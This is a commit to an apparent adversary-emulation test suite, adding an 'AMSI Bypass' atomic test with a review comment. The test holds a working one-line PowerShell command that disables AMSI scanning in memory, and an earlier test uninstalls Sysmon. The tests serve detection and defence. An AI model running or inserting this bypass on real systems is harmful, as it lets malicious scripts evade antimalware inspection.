New Detection - T1089 (#568)

An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" function to true. This is a simple atomic test that executes this unhooking behavior.
This commit is contained in:
JimmyAstle
2019-09-17 14:33:22 -04:00
committed by Michael Haag
parent 1df960f3c4
commit 26263baec9
+13
@@ -150,3 +150,16 @@ atomic_tests:
sysmon -u
cleanup_command: |
sysmon -i -accepteula
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
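Review bot: The `description` block of the new test (the "Any easy way to bypass AMSI inspection is it patch the dll ..." line) carries a grammar error and mislabels the target: the `command` calls `GetField('amsiInitFailed', ...)`, so `amsiInitFailed` is a static field, not a function. Suggest rewording to "An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the static field "amsiInitFailed" to true." Also, unlike the preceding Sysmon test, this entry has no `cleanup_command`; since `SetValue` only alters the `AmsiUtils` type loaded in the executing PowerShell process, a one-line note in the description that the change is confined to that process and needs no cleanup would make that omission deliberate rather than an oversight.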